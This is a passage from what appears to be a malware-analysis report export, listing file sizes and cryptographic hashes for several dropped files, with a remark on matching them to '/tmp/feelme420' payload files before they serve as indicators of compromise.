     SHA512  20204386063b3ea13c5db7527c80c8f651b8b6b003c8282335e79f4ded81aabf8e36bed2d238c6da09360e9f94cec954993eb366b409a38b4720c376621c4cf8

  5. Filesize 63KB
     MD5     8e8b3e650b8b979fca40999c2aef8077
     SHA1    af3f71ef4f46e03afc6c060ff3fdb858b98a54eb
     SHA256  ec953f9e9a20a77753750cf458536542c6e1a6871ea73e2d4dfb74b7055898c4
     SHA512  bb940245f77d7a2d886e71561f7d3a2beb3f6f0ada5a3a61718abe947be028a93a6eb21833e07d1710f4b425c0767184f5cd41890e81fefcd66e12273971151f

  6. Filesize 146KB
     MD5     1fd1ed52897289d90690ca1217e10df9
     SHA1    6a2663a4295793e0bc544d6c554b554688761668
     SHA256  15b6070e6e1ab9f89a2a55a64a5f6ca794129a75a38d1e88bda0c312254de6ce
     SHA512  042e4348ae538c0afc9c420347de6cb9f59462c18f6f319e18e3a5861d243ed645d78208d2d384670c7ce34bcd23ad0f6fba5cc8e9f2290ebe847313363f1bf3

  (The export does not pair these hashes with the payload file names; match them against the /tmp/feelme420.<arch> files from the "Writes file to tmp directory" list before using them as indicators.)